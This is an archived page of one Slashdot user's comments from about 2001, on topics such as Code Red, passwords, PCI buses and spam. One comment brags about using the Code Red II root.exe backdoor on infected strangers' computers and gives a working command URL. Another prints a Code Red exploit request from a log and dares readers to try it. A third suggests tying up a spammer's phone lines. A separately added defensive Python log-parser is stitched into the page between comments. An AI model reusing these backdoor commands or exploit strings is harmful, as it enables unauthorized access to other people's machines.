Slashdot Mirror


User: ZanshinWedge

ZanshinWedge's activity in the archive.

Stories: 0
Comments: 238

Comments · 238

  1. Oh god this is too much fun! on Code Red II: Shells for the Taking · · Score: 2

    I've created a script that parses my server logs for code red hits, then prints up a webpage with each ip linked to "http://[ipaddy]/scripts/root.exe?/c+dir+c:\". It's amazing how many people's computers are just wide open. It's really easy to create, rename, delete, or display just about any file on the poor sap's computer. For example, "http://[ipaddy]/scripts/root.exe?/c+echo+IIS+SUCK S!+>+c:\CODEREDATETHELASTOFYOURCORNFLAKES.txt".

    I mean, errr, hypothetically it would be possible to do such things, uhhh yeah.

  2. Re:cisco 675 hanging. on Code Red Back For More · · Score: 2
    Nope, there's a better solution. You want to use NAT to redirect port 80. For example, telnetting into the ol' cbos, you'd type something like:

    set nat enable
    set nat entry add [insert outside ip here] 80 10.255.255.200 17000 tcp
    write
    exit


    Or, you could add a filter to deny incoming traffic on port 80.

  3. Re:murder or accident? on Iceman Murdered by Arrow in the Back · · Score: 4

    riiiiight, it's really easy to accidentally hit someone with an arrow.

    "It just went off when I was cleaning it (and after I had strung, drawn, aimed, and loosed it)."

    Sheesh, who would have thought uninformed opinions would run rampant on slashdot?! Errrr, uh, nevermind then.

  4. Re:What if it was a bank? on Nuclear Materials System Not Buggy, Says Microsoft · · Score: 2

    What?! You are asking me to appreciate the gravity of this problem by couching it in monetary terms instead of accounting of, real, nuclear warheads? On my "list of things to get worried about", "your federally insured bank has misplaced 70 million dollars" ranks slightly below "your government has misplaced a few thermonuclear weapons".

  5. Re:If you don't run IIS but.... on Code Red Worm Spreading, Set To Flood Whitehouse · · Score: 2

    Just checked my (apache) servers and I've found a total of 38 hits for default.ida?NNN...

    One hit from each ip, earliest hit was 9am today, latest was 6pm (PST).

    Here's a sample log file entry:

    63.203.152.124 - - [19/Jul/2001:09:50:57 -0700] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858% ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%uc bd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531 b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 325

    Hmmm, anyone daring enough to set up an IIS box, hit it with this url and see what happens?
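
Added example, not part of the original comment: a defender-side pass over Apache access logs that picks out `default.ida` probes of the shape shown in the sample entry above and reports distinct sources, response codes, and the first and last hit. The log lines, documentation-range IP addresses and shortened `%u` tail are constructed, and the 32-character padding threshold is an assumption; the match accepts any repeated padding letter, not only `N`.

```python
import re
from collections import Counter
from datetime import datetime

# Apache Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) \S+$')
# Probe: /default.ida? + run of >=32 identical letters (assumed threshold) + %uXXXX
PROBE = re.compile(r'^/default\.ida\?([A-Za-z])\1{31,}.*?%u[0-9a-fA-F]{4}')

def parse(line):
    """Return (ip, time, target, status), or None if the line is not valid CLF."""
    m = CLF.match(line.strip())
    if not m:
        return None
    ip, ts, request, status = m.groups()
    _, _, rest = request.partition(" ")            # drop the method
    target, _, _ = rest.rpartition(" ")            # drop the protocol token
    try:
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
    except ValueError:
        return None
    return ip, when, target or rest, int(status)

def summarize(lines):
    """Count probe hits per source and record status codes and time window."""
    per_ip, statuses, times = Counter(), Counter(), []
    for line in lines:
        rec = parse(line)
        if rec is None or not PROBE.match(rec[2]):
            continue
        ip, when, _, status = rec
        per_ip[ip] += 1
        statuses[status] += 1
        times.append(when)
    return {
        "hits": sum(per_ip.values()),
        "sources": dict(per_ip),
        "statuses": dict(statuses),
        "first": min(times, default=None),
        "last": max(times, default=None),
    }

# Constructed sample data: documentation-range IPs and a shortened %u tail.
PAD, TAIL = "N" * 224, "%u9090%u6858%ucbd3%u7801=a"
SAMPLE = [
    f'192.0.2.10 - - [19/Jul/2001:09:50:57 -0700] "GET /default.ida?{PAD}{TAIL} HTTP/1.0" 400 325',
    f'192.0.2.10 - - [19/Jul/2001:09:51:30 -0700] "GET /default.ida?{PAD}{TAIL} HTTP/1.0" 400 325',
    f'198.51.100.7 - - [19/Jul/2001:18:02:11 -0700] "GET /default.ida?{PAD}{TAIL} HTTP/1.0" 404 205',
    '203.0.113.5 - - [19/Jul/2001:10:01:00 -0700] "GET /default.ida?page=2 HTTP/1.0" 404 205',
    'truncated or corrupt line',
]

if __name__ == "__main__":
    print(summarize(SAMPLE))
```

The status tally is the part worth reading first: 4xx answers from a non-IIS server mean the probe found nothing to run on, while a source address inside your own ranges points to a host that needs cleaning.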

  6. This is just unbelievable on Sklyarov Arrest Follow-up · · Score: 2

    My mind is boggling here. I can't believe that anyone of any level of technical sophistication would think rot-13 was any type of advanced encryption. It's not even advanced for 100 years ago for fuck's sake! Any type of fixed cypher was outdated over 50 years ago and rot-13 is one of the most trivial of fixed cyphers. They might as well have used rot-0 (i.e. a=a, b=b, c=c, etc.). I'm still boggling. Do these companies use this crap because they're lazy or do they honestly think it is good technology?! Really, I'd like to know!

  7. Re:Repo men are impressive on Dot-com Liquidator · · Score: 2

    You mean, stolen. If a repo man can do it without being seen, so can a thief. It must suck to have bad security. Normally repo men do not work in hiding, but officially ask whoever runs the place to be handed over the machine.

    Yup, most repo men will be fairly upfront (especially with something "owned" by a company and not an individual) and present their "warrant of repossession".

  8. Top 10 things you hear in the optical LAN office. on 100Mbit Optical Wireless Network · · Score: 5

    10. I had to quit smoking, it dropped my throughput by 5%
    9. The mail server is in my office so I can't take naps with the door closed now
    8. Ya know, I heard that at night they hook up the security alarm to a dropped packet detector
    7. Ahhhhhhg, I'm blinded by the bandwidth!
    6. Is this air plenum or non-plenum?
    5. No more naked web surfing
    4. Hey hot stuff, your packets are falling on my crotch, ya wanna go out later?
    3. Every time I sneeze the DHCP server assigns my nose an IP
    2. Cool, I can build a router with a mirror, some gum, and 3 rubber bands.
    1. Hey, would you move, you're blocking my bandwidth!

  9. But why? on C Styled Script - C-like Scripting Language · · Score: 2

    Aside from the issues surrounding yet ANOTHER computer related technology named CSS (cascading style sheets and content scrambling system (DVDs)) what exactly is the advantage to a c-like scripting language? It would seem to me (and to anyone who had done a substantial amount of scripting and C programming) that the entire philosophy and modus operandi of C and scripting languages are completely and utterly different. Moreover, what precisely is wrong with the (myriad) scripting languages we have now? Are there those who cannot find something among bourne shell, awk, sed, perl, python, and others that they can understand and use? Perl 5 is about as easy a language to learn as exists, and Python is about the same. I don't see a valid niche where this new beast might make a happy living. It's simply redundant and unnecessary.

  10. Too many damn passwords! on The Psychology of Passwords · · Score: 2

    Every damn website wants a different password. For maximum security every password should be completely random and different.

    Back in the real world....
    I say, you have to know the level of importance of what the password is for. There's obviously a difference in importance to the root password for the database server you admin. at work and the password for your slashdot account. There's nothing wrong with using more easily remembered passwords for the low level stuff (various web sites and such) and only the highest level for the important stuff.

    One thing that I do for the "huge sea of moderately unimportant passwords that I don't need to use often" is put them in a text file and encrypt it using pgp. On the rare occasions when I need the password I can unencrypt it and copy/paste.

  11. So you're telling me.... on "Defacing" Sites Without Intruding? · · Score: 5

    That you were too lazy to copy an 800 byte image to your own server and link to that? Yes, I recognize that such tasks are a huge chore. Hell, it would probably take an hour just to download the image, and another hour reading through documentation and sending emails to support lists to figure out how to move the image to a directory you can link to, and then probably at least half an hour (again, slogging through that documentation) to figure out how to change the image link in your html document. And then there's the cost issue. Hard drives aren't cheap, and 800 bytes is almost two full sectors! Plus you have the inconvenience of having 800 bytes of storage space on your system no longer available for other uses. All around it is just a day long pain in the ass ordeal. But, once you are finally finished the good news is that your site won't be able to be defaced like that anymore.

  12. Re:God... on Red Hat DB = PostgreSQL - Confirmed · · Score: 2

    I dunno, it's hard to feel pathetic when your RDBMS knowledge boosts your salary by a few $10k per year.

  13. What's the big deal? on Ring-Tone Royalties · · Score: 2

    I don't see the big deal, I think they are well within their rights. Someone wrote a song, someone else is trying to profit by selling that song without paying royalties. End of story, they need to pay royalties. This is the way it's supposed to work, this is what it's all about. Despite what the RIAA, MPAA, and their stooges may have you believe, this is the reason we have copyright law. To protect one company from other companies who would profit by selling another's work without proper compensation. That is the real intellectual property threat.

    Now in something like Napster I think the situation is much less clear cut, and I don't think it's a good comparison.

  14. Re:Big fucking deal on MSN Buys 500,000 Qwest.Net Customers · · Score: 2

    That's not so easy, especially if you have broadband. In many areas serviced by qwest, qwest is the only broadband carrier AND ISP. Moreover, they often do many little sneaky things to make sure it stays that way, or close to it. I am lucky enough that there are more ISPs in my area, and I will indeed switch, but many people are not so lucky.

  15. Re:There goes the neighborhood on MSN Buys 500,000 Qwest.Net Customers · · Score: 2
    Qwest did the same thing, though they are not a railroad, they simply made deals with railroads.

    linkage from the horse's mouth.

  16. Re:I don't think this is useful... on Learn The Language Of Math · · Score: 2

    That's completely pointless though. The reference to sourcecode is not apt. The "sourcecode" is already there, and it is for people who have the capability of using it (mathematicians). "Metamath" translates mathematical proofs into lower level "language", this would be like translating source code into (say) BASIC. Is that useful? Are there people who are going to be willing to try to understand the (now much more voluminous) source code when translated into BASIC who do not understand higher languages? I doubt it. Translating highly dense source code that makes use of many advanced programming techniques, libraries, specific aspects of the hardware environment, etc. into kajillions more lines of generic easier to read pseudo-code (or whatever) so that someone can hypothetically read the "source code" and see exactly how it works without understanding higher level programming concepts etc. seems like a waste of time. If you want to explain to someone who doesn't have the necessary background in a subject how something complicated works, you do so in English you don't try to explain every little detail. If someone has a burning need to understand every little detail of the proof of Fermat's Last Theorem, or the proof of the Fundamental Theorem of Calculus, etc. they should become mathematicians.

  17. I don't think this is useful... on Learn The Language Of Math · · Score: 2

    Formal mathematical proofs are usually only useful to mathematicians. For most people it suffices to tell them that the theory is true and has been proved to be so. I don't think it's going to help people to slog through abstract mathematics at unprecedented levels of detail. I think the public would be much better served with concise regular English descriptions of mathematical concepts and perhaps the how and why of certain mathematical proofs. Techies need math, they don't need to try to be mathematicians.

  18. Re:JavaServlets on PHP, Perl, Java Servlets - What's Right For You? · · Score: 2

    Hmmm, I don't know where you get that "poor performance" thing from. In my experience Perl is at least as fast as PHP, without mod_perl even. As for regular expressions, yes, that is an excellent point. Perl is very heavily wedded to REs and it shows. Sure, to some extent you get most of the same RE functionality in PHP, but it is much more cumbersome and annoying to use. Another great advantage of Perl (IMO) is the ease of creating modules and libraries and the huge base of modules out there. If you want to do something non-routine with Perl, it's a good bet that someone has written a module to help you out. There are so many modules for Perl that it is really astonishing the level and breadth of tasks that you can take on with Perl.

  19. Re:Who the hell uses PCI for graphics anyway? on When The PCI Bus Departs · · Score: 2

    AGP is not a bus standard. AGP is for one card, and only one. Two AGP slots on one motherboard is sheer fantasy and would require a new "AGP standard". Notice that they don't call it an interface or a bus, they call it a "port". Which is what AGP is. It's a very high speed port to the memory. If you want AGP speeds in a bus, use 66-MHz 64-bit PCI (which is a bus, and is a standard).

  20. Re:Its not needed on When The PCI Bus Departs · · Score: 2
    Hmmm, not needed eh? Well, of course there's the standard gaming needs. Then there are similar needs, 3D rendering etc. With faster processors and faster busses, 3D rendering gets faster too (duh). 2D graphics also get a boost. Should be good for graphic artists. But, here's something us techies should be thinking about. Servers. Imagine a single box that can handle incredibly high usage loads (in webserver terms, think serving up gigabytes and millions of hits per day). Now imagine something somewhat similar. Routers. Switches. Gateways. Faster busses + faster ram + faster processors = better (and cheaper!) networks.

    Here's a future scenario that may be made possible (in part) by faster busses: you create your own server and host it at home on a spare / old machine connected to the internet through your cheap gigabit ethernet connection. Fantasy you say? In a year or two after uber-fast busses are mainstream, the price will drop enough to be available for use in budget boxes. Cheap high-speed networking equipment will enable faster links across the world at fractions of present cost. A major part of the cost of modern high speed networking comes from the expense of maintaining and operating many exotic high-speed routers, switches, etc. Lowering those costs means more ultra-high-speed backbones, more high-speed links, and more high-speed connections to homes. Gigabit to the curb could very well be a reality, perhaps as soon as 2005.

    Adoption of this type of technology for mainstream use could very well bring things like streaming video serving, data warehousing, mega popular web site hosting and serving, etc. into the realm of the hobbyist. As in times past, so in times future, what was once the realm of the elite and the wealthy will become commonplace. It's a good thing.

  21. Re:BGP on Whatever Happened to Internet Redundancy? · · Score: 5
    Yup. If I had to sum up the flakiness of the internet in one word it would be "routing". When every link works as it is supposed to internet routing is already strained nearly to the breaking point. Screw up a link here or there, or update a routing table or software and drop a router or two, and poof, major internet cluster fuck. Theoretically your packets are supposed to be routed differently if they can't reach a destination. But in practice that rarely occurs. Most of the time you get the same route sending your packets into the same big brown smelly hole like lemmings. Enjoy! The other major contributor to internet flakiness is the organization of the major links and interlinks. There are few uber-high bandwidth pipes and they are rarely organized to provide superior routing and redundancy.

    There are a few hopeful signs on the horizon though. IPv6 should make routing a lot easier and give us a lot more operational "breathing room" which we can use for redundancy and robustness. There will also be a lot more high speed fiber optic links from hither and thither, which should help out quite a bit (especially to fix the "backhoe" vulnerability).

  22. Re:And why on Earth not? on CERT To Charge For 'Timely Alerts' · · Score: 3
    One, CERT isn't a private organization, they get tax money. Two, why buy something that's late and of inferior quality? Doesn't make a whole lot of sense.

    And, for the record, socialism has worked out pretty well. Just ask the developed world. Or hadn't you noticed the socialist aspects of all modern industrialized nations? Welfare, unemployment benefits, social security, government funded roadways, medicare, medicaid, government grants to college students, the list goes on and on. And in Europe and Canada they are even more socialist! With their nationalized health care and whatnot. The majority of the government budgets for all industrialized nations is for "socialist" programs.

    Communism however is a different ball of wax.

    Imagine that, a slashdot troll who doesn't know his ass from a hole in the ground.

  23. Re:YOU got robbed?! on Calling Out TiVo · · Score: 2

    That's the point, you only have partial control. You can watch it or not. Maybe you can write or call in and complain or praise, but that's it. You can't say "that's too much money for that show, but I'd pay half, or that's too little I'd pay twice or three times as much".

  24. Also..... on The Quickly Descending Unix Timestamp · · Score: 5

    In case you were wondering, unixtime 123456789 occurred on
    Thu Nov 29 13:33:09 1973
    (please do not waste mod points on this post, thanks)

  25. Re:Most of the dirtbags who spam me use 800 number on I Won A Lawsuit Against A Spammer · · Score: 3

    Or..... you could go to a semi-out of the way block of pay phones, dial the 800 number on each phone (which you can do with no money since it's toll free) and leave the phones dangling off the hook. You use up their lines and you cost them money.